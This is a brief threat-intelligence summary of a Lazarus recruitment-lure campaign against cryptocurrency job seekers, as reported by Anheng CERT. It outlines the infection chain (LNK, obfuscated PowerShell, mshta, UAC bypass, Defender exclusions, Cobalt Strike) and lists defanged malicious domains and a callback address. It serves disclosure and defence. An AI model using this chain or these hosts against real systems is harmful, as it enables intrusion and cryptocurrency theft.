Anheng CERT attributed a renewed Dream Job-style operation to Lazarus after observing Binance developer recruitment lures aimed at job seekers, with the suspected objective of cryptocurrency theft. The delivery chain used password-protected PDF decoys alongside a fake Password.txt LNK file that launched obfuscated PowerShell and mshta to retrieve remote HTA code. Later stages decrypted AES/Gzip-packed PowerShell, attempted UAC bypass, added Windows Defender exclusions, and downloaded Cobalt Strike via gdk.exe and jdk.exe. The activity matters because it shows Lazarus reusing social-engineering patterns against cryptocurrency targets while changing obfuscation and evasion details; reported infrastructure included crypto.blockchaincapital[.]space, mira.itb.ac[.]id, filebin[.]net, and Cobalt Strike callback 174.038.24[.]107:80.